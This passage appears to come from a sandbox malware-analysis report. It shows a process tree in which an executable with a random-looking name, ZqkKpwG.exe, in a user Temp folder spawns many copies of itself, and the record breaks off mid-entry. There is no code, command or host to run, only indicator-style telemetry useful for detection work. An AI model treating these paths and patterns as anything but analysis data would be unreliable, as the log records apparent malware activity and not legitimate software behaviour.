        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9600
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9616
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9624
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9632
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9640
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9648
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9656
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9664
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9672
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9680
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9688
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9696
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9704
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9712
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9720
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9728
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9736
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9744
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9752
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9764
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9780
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9788
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9796
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9804
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9812
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9820
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9828
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9836
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9844
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9852
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9860
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9868
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9876
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9884
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9892
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9900
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9908
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9916
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9924
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9932
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9940
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9948
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9956
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9964
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9972
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9980
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9988
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9996
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10004
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10012
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10020
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10028
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10036
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10044
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10052
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10060
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10068
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10076
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10084
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10092
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10100
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10108
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10116
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10124
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10132
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10140
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10148
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10160
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10168
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10176
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10188
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10204
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10212
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10220
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10228
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10236
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9596
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5072
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9776
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10156
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9612
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10244
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10252
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10260
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10268
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10276
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10284
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10292
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10300
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10308
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10316
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10324
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10332
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10340
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10348
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10356
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10364
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10372
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10380
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10388
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10396
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10404
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10412
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10420
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10428
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10436
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10444
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10452
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10460
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10468
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10476
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10484
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10496
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10508
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10520
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10528
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10536
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10544
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10552
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10560
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10568
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10576
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10584
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10592
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10600
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10608
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10616
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10624
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10632
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10640
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10656
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10668
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10676
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10684
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10692
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10700
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10708
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10716
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10724
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10732
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10740
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10748
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10756
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10764
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10772
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10780
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10792
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10800
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10808
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10816
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10824
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10840
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10860
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
